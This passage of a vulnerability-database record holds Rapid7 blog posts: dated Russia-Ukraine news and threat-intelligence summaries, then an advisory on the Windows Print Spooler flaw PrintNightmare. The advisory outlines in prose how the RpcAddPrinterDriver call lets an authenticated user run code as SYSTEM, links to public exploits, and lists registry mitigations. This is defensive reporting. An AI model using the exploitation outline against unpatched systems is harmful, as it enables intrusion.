The resource will be updated as each of the three organizations releases relevant new content.\n\nThe Wall Street Journal [is reporting](<https://www.wsj.com/articles/russian-prosecutors-warn-western-companies-of-arrests-asset-seizures-11647206193>) that Russian prosecutors have issued warnings to Western companies in Russia, threatening to arrest corporate leaders there who criticize the government or to seize assets of companies that withdraw from the country. \n\nRussia may [default on $117 million (USD) in interest payments](<https://qz.com/2142075/sanctions-are-likely-to-force-russia-to-default-on-foreign-debt/>) on dollar-denominated bonds due to Western sanctions, the first foreign debt default by Russia since 1918.\n\nReuters is [reporting](<https://www.usnews.com/news/world/articles/2022-03-14/russian-delegation-suspends-participation-in-council-of-europe-body-ria>) that Russia's delegation to the Parliamentary Assembly of the Council of Europe (PACE) is suspending its participation and will not take part in meetings. \n\nCNN [reports](<https://www.cnn.com/europe/live-news/ukraine-russia-putin-news-03-15-22/h_3f0d63658ac5c2875ed265df00ba8b40>) that Russia has imposed sanctions against US President Joe Biden, his son, Secretary of State Antony Blinken, other US officials, and \u201cindividuals associated with them,\u201d the Russian Foreign Ministry said in a statement on Tuesday.\n\n**Threat Intelligence Update**\n\n * ******Russian ****s****tate-****s****ponsored ****c****yber ****a****ctors ****a****ccess ****n****etwork ****m****isconfigured with ****d****efault MFA ****p****rotocols******\n\nCISA and the Federal Bureau of Investigation (FBI) have released a joint Cybersecurity Advisory that details how Russian state-sponsored cyber actors accessed a network with misconfigured default multifactor authentication (MFA) protocols. 
The actors then exploited a critical Windows Print Spooler vulnerability, [\u201cPrintNightmare\u201d (CVE-2021-34527)](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>), to run arbitrary code with system privileges.\n\n_Source: [CISA](<https://www.cisa.gov/uscert/ncas/current-activity/2022/03/15/russian-state-sponsored-cyber-actors-access-network-misconfigured>)_\n\n * ******Fake antivirus updates used to deploy Cobalt Strike in Ukraine******\n\nUkraine's Computer Emergency Response Team is warning that threat actors are distributing fake Windows antivirus updates that install Cobalt Strike and other malware. The phishing emails impersonate Ukrainian government agencies offering ways to increase network security and advise recipients to download \"critical security updates,\" which come in the form of a 60 MB file named \"BitdefenderWindowsUpdatePackage.exe.\"\n\n_Source: [BleepingComputer/CERT-UA](<https://www.bleepingcomputer.com/news/security/fake-antivirus-updates-used-to-deploy-cobalt-strike-in-ukraine/amp/>)_\n\n * ******A ****n****ovel ****w****iper ****t****argets Ukrainian ****e****ntities******\n\nCybersecurity researchers observed the new CaddyWiper malware targeting Ukrainian organizations. Once deployed, CaddyWiper destroys and overwrites the data from any drives that are attached to the compromised system. 
Despite being released in close proximity to other wiping malware targeting Ukraine, such as HermeticWiper and IsaacWiper, CaddyWiper does not share any significant code similarities with them and appears to be created separately.\n\n_Source:[ Bleeping Computer](<https://www.bleepingcomputer.com/news/security/new-caddywiper-data-wiping-malware-hits-ukrainian-networks/amp/>)_\n\n * ******German Federal Office for Information Security ****a****gency ****i****ssues an ****a****lert for Russian ****a****ntivirus ****s****oftware Kaspersky******\n\nThe German Federal Office for Information Security agency (BSI) issued an alert urging its citizens to replace Kaspersky antivirus software with another defense solution, due to alleged ties to the Kremlin. The agency suggested Kaspersky could be used as a tool in the cyber conflict between Russia and Ukraine.\n\n_Source:[ BSI](<https://www.bsi.bund.de/DE/Service-Navi/Presse/Pressemitteilungen/Presse2022/220315_Kaspersky-Warnung.html>)_\n\n## March 14, 2022\n\nThe EU-based NEXTA media group has [reported](<https://twitter.com/nexta_tv/status/1503393046351781892?s=20&t=1tA7lZrLVe-cZpHb9wy2LA>) that Russia is starting to block VPN services.\n\nBermuda\u2019s aviation regulator [said](<https://financialpost.com/pmn/business-pmn/bermuda-revokes-licenses-for-russian-operated-planes-over-safety-concerns>) it is suspending certification of all Russian-operated airplanes registered in the British overseas territory due to international sanctions over the war in Ukraine, in a move expected to affect more than 700 planes.\n\nThe Washington Post [reported](<https://www.washingtonpost.com/world/2022/03/12/russia-putin-google-apple-navalny/>) that Federal Security Service (FSB), Russian Federalnaya Sluzhba Bezopasnosti, agents approached Google and Apple executives with requests to remove apps created by activist groups.\n\nAmnesty International 
[said](<https://www.amnesty.org/en/latest/news/2022/03/russia-authorities-block-amnesty-internationals-russian-language-website/>) Russian authorities have blocked their Russian-language website. \n\n**Threat Intelligence Update**\n\n * ******Anonymous claims to hack Rosneft, German subsidiary of Russian energy******\n\nAnonymous claimed to hack the German branch of the Russian energy giant Rosneft, allegedly stealing 20 TB of data. The company systems were significantly affected by the attack, although there currently seems to be no effect on the company's energy supply.\n\n_Source:[ Security Affairs](<https://securityaffairs.co/wordpress/129052/hacktivism/anonymous-hacked-german-subsidiary-rosneft.html>)_\n\n * ******Russia blocks access to Instagram nationwide******\n\nRussia's Internet moderator Roskomnadzor decided to block Instagram access in the country, following Meta's decision to allow \"calls for violence against Russian citizens.\" The federal agency gave Instagram users 48 hours to prepare and finally completed the act on March 13. 
The blocking of Instagram follows the former ban of Facebook and Twitter in Russia last week.\n\n_Source:[ Cyber News](<https://cybernews.com/cyber-war/instagram-is-no-longer-accessible-in-russia/?utm_source=youtube&utm_medium=cn&utm_campaign=news_CNN_047_instagram_blocked_in_russia&utm_term=2v1_yubOBMc&utm_content=direct_article>)_\n\n## March 11, 2022\n\nPresident Biden, along with the European Union and the Group of Seven Countries, [moved](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/11/fact-sheet-united-states-european-union-and-g7-to-announce-further-economic-costs-on-russia/>) to revoke \u201cmost favored nation\u201d trade status for Russia, deny borrowing privileges at multilateral financial institutions, apply sanctions to additional Russian elites, ban export of luxury goods to Russia, and ban US import of goods from several signature sectors of Russia\u2019s economy.\n\n**Threat Intelligence Update**\n\n * **Amid difficulties with renewing certificates, Russia has created its own trusted TLS certificate authority**\n\nSigning authorities based in countries that have imposed sanctions on Russia can no longer accept payments for their services, leaving many sites with no practical means to renew expiring certificates. As a result, the Russian Ministry of Digital Development announced the availability of domestic certificates, replacing expired or revoked foreign certificates.\n\n_Source: [Bleeping Computer](<https://www.bleepingcomputer.com/news/security/russia-creates-its-own-tls-certificate-authority-to-bypass-sanctions/>)_\n\n * ******Triolan, ****a**** major Ukrainian internet service provider****,**** was hacked \u2014 twice******\n\nTriolan, a Ukraine-based ISP with more than half a million subscribers, was reportedly hacked initially on February 24th, with a second attack hitting on March 9th. 
The company reported that the threat actors managed to hack into key components of the network, some of which couldn\u2019t be recovered.\n\n_Source: [Forbes](<https://www.forbes.com/sites/thomasbrewster/2022/03/10/cyberattack-on-major-ukraine-internet-provider-causes-major-outages/?sh=768d17596573>)_\n\n## March 10, 2022\n\nBy [order of President Putin](<https://twitter.com/KevinRothrock/status/1501935395092631556?s=20&t=TvFRrQvNfQ6OL3qvFJePQg>), Russia\u2019s Economic Development Ministry has drafted a bill that would effectively nationalize assets and businesses \"abandoned\" in Russia by foreign corporations. Management of these seized assets will be entrusted to the VEB.RF state development corporation and to Russia\u2019s Deposit Insurance Agency.\n\nRussia has [effectively legalized patent theft](<http://publication.pravo.gov.ru/Document/View/0001202203070005?index=0&rangeSize=1>) from anyone affiliated with countries \u201cunfriendly\u201d to it, declaring that unauthorized use will not be compensated. 
The Russian news agency Tass has [further reporting](<https://tass.ru/ekonomika/13982403>) on this, as does the [Washington Post](<https://www.washingtonpost.com/business/2022/03/09/russia-allows-patent-theft/>).\n\nGoldman Sachs Group Inc [announced it was closing its operations in Russia](<https://www.reuters.com/business/finance/goldman-sachs-exit-russia-bloomberg-news-2022-03-10/>), becoming the first major Wall Street bank to exit the country following Moscow's invasion of Ukraine.\n\nUK Foreign Secretary Liz Truss [announced](<https://www.gov.uk/government/news/abramovich-and-deripaska-among-seven-oligarchs-targeted-in-estimated-15bn-sanction-hit>) a full asset freeze and travel ban on seven of Russia\u2019s wealthiest and most influential oligarchs, whose business empires, wealth, and connections are closely associated with the Kremlin.\n\nUS Vice President Kamala Harris [announced](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/10/vice-president-kamala-harris-announces-additional-u-s-funding-to-respond-to-humanitarian-needs-in-ukraine-and-eastern-europe/>) nearly $53 million in new humanitarian assistance from the United States government, through the US Agency for International Development (USAID), to support innocent civilians affected by Russia\u2019s invasion of Ukraine.\n\nThe International Atomic Energy Agency (IAEA) [provided an update](<https://www.iaea.org/newscenter/pressreleases/update-17-iaea-director-general-statement-on-situation-in-ukraine>) on the situation at the Chernobyl Nuclear Power Plant. The IAEA Director General said that the Agency is aware of reports that power has now been restored to the site and is looking for confirmation. At the same time, Ukraine informed them that today it had lost all communications with the facility. 
The IAEA has assured the international community that there has been \u201cno impact on essential safety systems.\u201d\n\n**Threat Intelligence Update**\n\n * **New malware variant targeting Russia named RURansom**\n\nRURansom is a malware variant that was recently discovered and appears to be targeting Russia. While it was initially suspected of being a ransomware, further analysis suggests it is actually a wiper. So far, no active non-Russian targets have been identified, likely due to the malware targeting specific entities.\n\n_Source: [TrendMicro](<https://www.trendmicro.com/en_us/research/22/c/new-ruransom-wiper-targets-russia.html>)_\n\n_Available in Threat Library as: RURansom_\n\n * ******Kaspersky source code leak seems to be just a collection of publicly available HTML files******\n\nThe hacking group NB65 claimed on social networks to have leaked source code from the Russian antivirus firm Kaspersky. However, it appears that the leaked files are nothing more than a long list of HTML files and other related, publicly available web resources.\n\n_Source: [Cybernews](<https://cybernews.com/cyber-war/long-awaited-kaspersky-leak-doesnt-seem-to-be-a-leak-at-all/>)_\n\n * ******Anonymous claims to hack Roskomnadzor, a Russian federal agency******\n\nHacktivist group Anonymous claims to have breached Roskomnadzor, a Russian federal agency responsible for monitoring, controlling, and censoring Russian mass media, leaking over 360,000 (817.5 GB) files. Based on the report, the leak contains relatively recent censored documents, dated as late as March 5, and demonstrates Russia\u2019s attempts to censor media related to the conflict in Ukraine.\n\n_Source: @AnonOpsSE via [Twitter](<https://twitter.com/AnonOpsSE/status/1501944150794506256>) _\n\n## March 9, 2022\n\n**Public policy:** Citing concerns over rising cybersecurity risks related to the Russia-Ukraine conflict, the US is poised to enact new cyber incident reporting requirements. 
The_ _[Cyber Incident Reporting for Critical Infrastructure Act of 2022](<https://www.congress.gov/bill/117th-congress/senate-bill/3600/text?q=%7B%22search%22%3A%5B%22s+3600%22%2C%22s%22%2C%223600%22%5D%7D&r=3&s=2>):\n\n * Will require critical-infrastructure owners and operators to report cybersecurity incidents to CISA within 72 hours of determining the incident is significant enough that reporting is required;\n * Will require critical infrastructure owners and operators to report ransomware payments to CISA within 24 hours; and\n * Is intended to give federal agencies more insight into attack trends and potentially provide early warnings of major vulnerabilities or attacks in progress before they spread.\n\nThe Bank of Russia [established](<https://www.cbr.ru/eng/press/event/?id=12744>) temporary procedures for foreign cash transactions, suspending sales of foreign currencies until September 9, 2022. Foreign currency accounts are limited to withdrawals up to $10,000 USD.\n\nThe Financial Crimes Enforcement Network (FinCEN) is [alerting all financial institutions](<https://www.fincen.gov/index.php/news/news-releases/fincen-advises-increased-vigilance-potential-russian-sanctions-evasion-attempts>) to be vigilant against efforts to evade the expansive sanctions and other US-imposed restrictions implemented in connection with the Russian Federation\u2019s further invasion of Ukraine.\n\nThe Pentagon [dismissed](<https://www.cnn.com/2022/03/08/politics/poland-jets-ukraine-russia/index.html>) Poland\u2019s offer to transfer MIG-29 fighter jets to the United States for delivery to Ukraine, stating they did not believe the proposal was \u201ctenable.\u201d\n\n**Threat Intelligence Update**\n\n * ******Multiple hacking groups target Ukrainians and other European ****a****llies via ****p****hishing ****a****ttacks******\n\nSeveral threat actors, including Fancy Bear, Ghostwriter, and Mustang Panda, have launched a large phishing campaign against Ukraine, Poland, and 
other European entities amid Russia's invasion of Ukraine. \n\n_Source: [The Hacker News](<https://thehackernews.com/2022/03/google-russian-hackers-target.html>)_\n\n_Available in Threat Library as: APT28 (Fancy Bear), Ghostwriter, Mustang Panda_\n\n * ******The Conti Ransomware group resumes activity following leaks******\n\nThe Conti Ransomware group appears to have made a comeback following the [leak of its internal chats last week](<https://www.rapid7.com/blog/post/2022/03/01/conti-ransomware-group-internal-chats-leaked-over-russia-ukraine-conflict/>). On March 9, Rapid7 Threat Intelligence observed renewed activity on Conti\u2019s onion site, and CISA released new IOCs related to the group on their Conti alert page.\n\n_Source: [CISA](<https://www.cisa.gov/uscert/ncas/alerts/aa21-265a>)_\n\n_Available in Threat Library as: Conti_\n\n * ******The Belarusian group UNC1151 targets Ukrainian organizations using MicroBackdoor malware******\n\nThe Ukrainian government has reported on a continuous cyberattack on state organizations of Ukraine using malicious software Formbook.\n\n_Source: [Ukrainian CERT](<https://cert.gov.ua/article/37626>)_\n\n_Available in Threat Library as: UNC1151_\n\n## March 8, 2022\n\nThe US [announced](<https://www.whitehouse.gov/briefing-room/presidential-actions/2022/03/08/executive-order-on-use-of-project-labor-agreements-for-federal-construction-projects-2/>) a ban on imports of Russian oil, gas, and other energy products. New US investments in the Russian energy sector are also restricted. The UK [announced](<https://www.gov.uk/government/news/uk-to-phase-out-russian-oil-imports>) it would phase out Russian oil over 2022. \n\nThe International Atomic Energy Agency [published a statement](<https://www.iaea.org/newscenter/pressreleases/update-15-iaea-director-general-statement-on-situation-in-ukraine>) noting that remote data transmission from monitoring systems at Ukraine\u2019s mothballed Chernobyl nuclear power plant has been lost. 
No network data has been observed by internet monitoring companies since March 5, 2022.\n\nChris Chivvis, a senior fellow and director of the American Statecraft Program at the Carnegie Endowment for International Peace, has provided [an assessment](<https://carnegieendowment.org/2022/03/03/how-does-this-end-pub-86570>) of two likely trajectories in the Russia-Ukraine conflict. \n\nTwitter [announced](<https://twitter.com/AlecMuffett/status/1501282223009542151?s=20&t=tO-TNZw5ct6tZUcwyvMl4A>) they have made their social network available on the Tor Project onion service, which will enable greater privacy, integrity, trust, and availability to global users.\n\nThe Minister of Foreign Affairs of the Republic of Poland [announced](<https://www.gov.pl/web/diplomacy/statement-of-the-minister-of-foreign-affairs-of-the-republic-of-poland-in-connection-with-the-statement-by-the-us-secretary-of-state-on-providing-airplanes-to-ukraine>) they are ready to deploy \u2014 immediately and free of charge \u2014 all their MIG-29 jets to the Ramstein Air Force base and place them at the disposal of the US government.\n\nLumen [announced](<https://news.lumen.com/RussiaUkraine>) they are immediately ceasing their limited operations in Russia and will no longer provide services to local Lumen enterprise customers.\n\nMcDonald\u2019s [announced](<https://www.cnbc.com/2022/03/08/mcdonalds-will-temporarily-close-850-restaurants-in-russia-nearly-2-weeks-after-putin-invaded-ukraine.html>) they have temporarily closed 850 restaurants in Russia in response to Russia\u2019s attack on Ukraine.\n\nStarbucks [has announced](<https://www.cnbc.com/2022/03/08/starbucks-suspends-all-business-in-russia-as-putins-forces-attack-ukraine.html>) they will be suspending all business in Russia in response to Russia\u2019s attack on Ukraine.\n\n**Threat Intelligence Update**\n\n * ******52 US organizations were impacted by RagnarLocker ransomware****,**** including critical infrastructures******\n\nThe FBI 
reported that as of January 2021, 52 US-based organizations, some related to critical infrastructure, were affected by RagnarLocker ransomware. The industries affected include manufacturing, energy, financial services, government, and information technology. The malware code excludes execution on post-Soviet Union countries, including Russia, based on a geolocation indicator embedded in its code.\n\n_Source: [FBI FLASH](<https://www.ic3.gov/Media/News/2022/220307.pdf>) _\n\n_Available in Threat Library as: Ragnar Locker_\n\n * ******US energy companies were attacked prior to the Russian invasion to Ukraine******\n\nDuring a two-week blitz in mid-February, hackers received access to dozens of computers belonging to multiple US-based energy companies, including [Chevron Corp.](<https://www.bloomberg.com/quote/CVX:US>), [Cheniere Energy Inc.](<https://www.bloomberg.com/quote/LNG:US>), and [Kinder Morgan Inc](<https://www.bloomberg.com/quote/KMI:US>). The companies were attacked in parallel to the Russian invasion of Ukraine.\n\n_Source: [Bloomberg](<https://www.bloomberg.com/news/articles/2022-03-07/hackers-targeted-u-s-lng-producers-in-run-up-to-war-in-ukraine>)_\n\n * **European officials were hacked by Chinese threat actors amid the conflict in Ukraine**\n\nAccording to Google and Proofpoint, a cyberattack was launched by the Chinese hacking group Mustang Panda and its affiliated group RedDelta, which usually targets Southeast Asian countries. 
The groups managed to gain access to an unidentified European NATO-member email account and spread malware to other diplomatic offices.\n\n_Source: [Forbes](<https://www.forbes.com/sites/thomasbrewster/2022/03/08/chinese-hackers-ramp-up-europe-attacks-in-time-with-russia-ukraine-war/?sh=6077d22f5ee1>)_\n\n_Available in Threat Library as: Mustang Panda_ \n\n\n * ******#OpAmerica: DEVLIX_EU, a pro-Russian hacktivist group, and its affiliates claim to have gained access to terabytes of US sensitive data ******\n\nThe group claims they have obtained access to 92TB of data related to the US Army. According to the group, they also hacked into four of the biggest \u201chosts\u201d in the US and 49 TB of data. As of now, there is no real evidence for the attack provided by the group.\n\n_Source: @Ex_anon_W_hater via [Twitter](<https://twitter.com/Ex_anon_W_hater/status/1500858398664888325>)_\n\n## March 7, 2022\n\nNetflix, KPMG, PwC, and EY have [cut ties with local units in Russia,](<https://www.reuters.com/business/netflix-kpmg-pwc-amex-sever-ties-with-russia-2022-03-06/>) and Danone suspended investments in Russia.\n\nThe Russian government has [published a list of foreign states](<https://www.jpost.com/international/article-700559>) that have committed \u201cunfriendly actions\u201d against \u201cRussia, Russian companies, and citizens.\u201d Countries listed include Australia, Albania, Andorra, the United Kingdom, the member states of the European Union, Iceland, Canada, Liechtenstein, Micronesia, Monaco, New Zealand, Norway, Republic of Korea, San Marino, North Macedonia, Singapore, USA, Taiwan, Ukraine, Montenegro, Switzerland, and Japan.\n\nThe Russian government\u2019s Ministry of Digital [issued orders](<https://www.kommersant.ru/doc/5249500>) for all government websites to use only domestic hosting providers and DNS. 
They further instructed agencies to discontinue using non-Russian third-party tooling, such as Google Analytics.\n\nTikTok is [suspending content from Russia](<https://www.buzzfeednews.com/article/krystieyandoli/tiktok-russia-suspending-media>) in response to the country cracking down on reporting about the invasion of Ukraine.\n\n**Threat Intelligence Update**\n\n * **Anonymous-affiliated threat actor claims to have hacked and shut down water infrastructure in Russia**\n\nThe AnonGhost group claims to have hacked and shut down two Russian SCADA water supply systems impacting the Russian cities: Volkhov, Boksitogorsk, Luga, Slantsevsky, Tikhvinsky, and Vyborg.\n\n_Source: @darkowlcyber via [Twitter](<https://twitter.com/darkowlcyber/status/1500552186735910915?s=20&t=zXmKgw6Om_VQMHa6XmN6RQ>)_\n\n_Available in Threat Library as: AnonGhost (for Threat Command customers who want to learn more)_ \n\n\n * **Anonymous claims to hack Russian TV services to broadcast footage of the war with Ukraine**\n\nRussian live TV channels Russia 24, Channel One, and Moscow 24, as well as Wink and Ivi, Netflix like services, have been hacked to broadcast footage of the war with Ukraine according to Anonymous.\n\n_Source: @YourAnonNews via [Twitter](<https://twitter.com/YourAnonNews/status/1500613013510008836?s=20&t=qgOO0Uu5T2UrkqdbjEJeAg>)_\n\n## March 4, 2022\n\nThe NATO Cooperative Cyber Defence Center of Excellence (CCDCOE) announced that [Ukraine will join the group](<https://news.yahoo.com/ukraine-join-nato-cyber-defence-171835083.html>) as a \u201ccontributing participant,\u201d indicating that \u201cUkraine could bring valuable first-hand knowledge of several adversaries within the cyber domain to be used for research, exercises, and training.\u201d\n\nUkraine\u2019s deputy chief of their information protection service [noted in a Friday briefing](<https://www.bloomberg.com/news/articles/2022-03-04/ukraine-s-hacker-army-said-to-be-helped-by-400-000-supporters>) that over 400,000 
individuals have volunteered to help a crowdsourced Ukrainian government effort to disrupt Russian government and military targets.\n\n**Threat Intelligence Update**\n\n * **Russia blocked access to social media platforms and Western news sites**\n\nRussia has blocked its residents' access to information channels, including Facebook, Twitter, Western news sites such as the BBC, and app stores. In response, the BBC is now providing access to its website via the Dark Web and has reinstated its shortwave broadcast service.\n\n_Source: [Reuters](<https://www.reuters.com/business/russias-offer-foreign-firms-stay-leave-or-hand-over-keys-2022-03-04/>)_\n\n * **Anonymous-affiliated threat actor hacked and leaked data from the Russian Federal State Budgetary Institution of Science**\n\nThe Russian Federal Guard Service of the Russian Federation was hacked by Anonymous. The hacker published leaked names, usernames, emails, and hashed passwords of people from the institution.\n\n_Source: @PucksReturn via [Twitter](<https://twitter.com/PucksReturn/status/1499757796526542855?s=20&t=LQqanSu2v7L5ONAkpZT1PA>)_\n\n * **Anonymous takes down multiple Russian government websites**\n\nAnonymous claims responsibility for the takedown of a large number of Russian Government websites including one of the main government websites, gov.ru. Most of the websites are still down as of Friday afternoon, March 4.\n\n_Source: @Anonynewsitaly via [Twitter](<https://twitter.com/Anonynewsitaly/status/1499488100405362694?s=20&t=92-u27VSsZLoTAz1KtuOKA>)_\n\n## March 3, 2022\n\n**Additional sanctions:** The US Treasury Dept. [announced another round of sanctions](<https://home.treasury.gov/news/press-releases/jy0628>) on Russian elites, as well as many organizations it characterized as outlets of disinformation and propaganda.\n\n**Public policy:** The Russia-Ukraine conflict is adding momentum to cybersecurity regulatory actions. 
Most recently, that includes\n\n * **[Incident reporting law](<https://www.hsgac.senate.gov/media/majority-media/senate-passes-peters-and-portman-landmark-legislative-package-to-strengthen-public-and-private-sector-cybersecurity->): **Citing the need to defend against potential retaliatory attacks from Russia, the US Senate passed a bill to require critical infrastructure owners and operators to report significant cybersecurity incidents to CISA, as well as ransomware payments. The US House is now considering fast-tracking this bill, which means it may become law quite soon.\n * **[FCC inquiry on BGP security](<https://www.fcc.gov/document/fcc-launches-inquiry-internet-routing-vulnerabilities>): **\u201c[E]specially in light of Russia\u2019s escalating actions inside of Ukraine,\u201d FCC seeks comment on vulnerabilities threatening the Border Gateway Protocol (BGP) that is central to the Internet\u2019s global routing system.\n\n**CISA threat advisory:** CISA [recently reiterated](<https://twitter.com/CISAJen/status/1499117064006639617?s=20&t=9UfrQnQTUg43QsbKoQOhJA>) that it has no specific, credible threat against the U.S. at this time. 
It continues to point to its [Shields Up](<https://www.cisa.gov/shields-up>) advisory for resources and updates related to the Russia-Ukraine conflict.\n\n**Threat Intelligence Update**\n\n * **An Anonymous-affiliated hacking group claims to have hacked a branch of the Russian military and Rosatom, the Russian State Atomic Energy Corporation.**\n\nThe hacktivist group Anonymous and its affiliate have hacked and leaked the phone directory of the military prosecutor's office of the southern military district of Russia, as well as documents from the Rosatom State Atomic Energy Corporation.\n\n_Available in Threat Library as: OpRussia 2022 (for Threat Command customers who want to learn more)_\n\n * **A threat actor supporting Russia claims to have hacked and leaked sensitive information related to the Ukrainian military.**\n\nThe threat actor \u201cLenovo\u201d claims to have hacked a branch of the Ukrainian military and leaked confidential information related to its soldiers. The information was published on an underground Russian hacking forum.\n\n_Source: XSS forum (discovered by our threat hunters on the dark web)_ \n\n\n * **An Anonymous-associated hacktivist group took down the popular Russian news website lenta.ru**\n\nAs part of the OpRussia cyber-attack campaign, an Anonymous hacktivist group known as \u201cEl_patron_real\u201d took down one of the most popular Russian news websites, **lenta.ru**. 
As of Thursday afternoon, March 3, the website is still down.\n\n_Available in Threat Library as: El_patron_real (for Threat Command customers who want to learn more)_\n\n_**Additional reading:**_\n\n * [_Conti Ransomware Group Internal Chats Leaked Over Russia-Ukraine Conflict_](<https://www.rapid7.com/blog/post/2022/03/01/conti-ransomware-group-internal-chats-leaked-over-russia-ukraine-conflict/>)\n * [_Russia/Ukraine Conflict: What Is Rapid7 Doing to Protect My Organization?_](<https://www.rapid7.com/blog/post/2022/02/25/russia-ukraine-conflict-what-is-rapid7-doing-to-protect-my-organization/>)\n * [_Staying Secure in a Global Cyber Conflict_](<https://www.rapid7.com/blog/post/2022/02/25/russia-ukraine-staying-secure-in-a-global-cyber-conflict/>)\n * [_Prudent Cybersecurity Preparation for the Potential Russia-Ukraine Conflict_](<https://www.rapid7.com/blog/post/2022/02/15/prudent-cybersecurity-preparation-for-the-potential-russia-ukraine-conflict/>)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-04T14:30:00", "type": "rapid7blog", "title": "Russia-Ukraine Cybersecurity Updates", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-04T14:30:00", "id": "RAPID7BLOG:57AB78EC625B6F8060F1E6BD668BDD0C", "href": "https://blog.rapid7.com/2022/03/04/russia-ukraine-cybersecurity-updates/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-12T14:55:46", "description": "\n\n**Vulnerability note:** This blog originally referenced CVE-2020-1675, but members of the community noted the week of June 29 that the publicly available exploits that purported to exploit CVE-2021-1675 may in fact have been targeting a new vulnerability in the same function as CVE-2021-1675. This was later confirmed, and Microsoft issued a new CVE for what the research community originally thought was CVE-2021-1675. Defenders should now follow guidance and remediation information on the new vulnerability identifier, [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>), instead.\n\nOn June 8, 2021, Microsoft released an advisory and patch for [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>) (\u201cPrintNightmare\u201d), a critical vulnerability in the Windows Print Spooler. Although [originally classified](<https://www.rapid7.com/blog/post/2021/06/08/patch-tuesday-june-2021/>) as a privilege escalation vulnerability, security researchers have demonstrated that the vulnerability allows authenticated users to gain remote code execution with SYSTEM-level privileges. On June 29, 2021, as proof-of-concept exploits for the vulnerability began circulating, security researchers discovered that a vulnerability they thought to be CVE-2021-1675 was still exploitable on some systems that had been patched. 
As of July 1, at least three different proof-of-concept exploits [had been made public](<https://github.com/afwu/PrintNightmare>).\n\nRapid7 researchers confirmed that public exploits worked against fully patched Windows Server 2019 installations as of July 1, 2021. The vulnerable service is enabled by default on Windows Server, with the exception of Windows Server Core. Therefore, it is expected that in the vast majority of enterprise environments, Windows systems are vulnerable to remote code execution by authenticated attackers.\n\nThe vulnerability is in the `RpcAddPrinterDriver` call of the Windows Print Spooler. A client uses the RPC call to add a driver to the server, storing the desired driver in a local directory or on the server via SMB. The client then allocates a `DRIVER_INFO_2` object and initializes a `DRIVER_CONTAINER` object that contains the allocated `DRIVER_INFO_2` object. The `DRIVER_CONTAINER` object is then used within the call to `RpcAddPrinterDriver` to load the driver. This driver may contain arbitrary code that will be executed with SYSTEM privileges on the victim server. This command can be executed by any user who can authenticate to the Spooler service.\n\n## Updates\n\n**9 July 2021**: Microsoft [released revised guidance on CVE-2021-34527](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>) the evening of July 8. According to the Microsoft Security Response Center, the out-of-band security update "is working as designed and is effective against the known printer spooling exploits and other public reports collectively being referred to as PrintNightmare. All reports we have investigated have relied on the changing of default registry setting related to Point and Print to an insecure configuration." 
This is consistent with Microsoft's emphasis earlier in the week that the out-of-band update effectively remediates CVE-2021-34527 **as long as Point and Print is not enabled.**\n\nThe [updated guidance from July 8, 2021](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>) also contains revisions to the registry keys that must be set to `0` (or must not be present) in order to ensure that Point and Print is disabled in customer environments. Previously, Microsoft's guidance had been that Point and Print could be disabled by setting the following registry keys to `0` (or ensuring they are not present):\n\n * `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall = 0` and\n * `NoWarningNoElevationOnUpdate = 0`\n\n**However, as of July 8, 2021, one of the registry keys that must be set to a 0 (zero) value has changed.** Current guidance is that Point and Print can be disabled by setting the following registry keys to `0` (or ensuring they are not present):\n\n * `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall = 0` (DWORD) or not defined (default setting) **and**\n * `UpdatePromptSettings = 0` (DWORD) or not defined (default setting)\n\nWe have updated the `Mitigation Guidance` section in this post to reflect the latest remediation guidance from Microsoft. Further details can still be found in [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>).\n\n**7 July 2021**: Microsoft released out-of-band updates for some (but not all) versions of Windows the evening of July 6, 2021. 
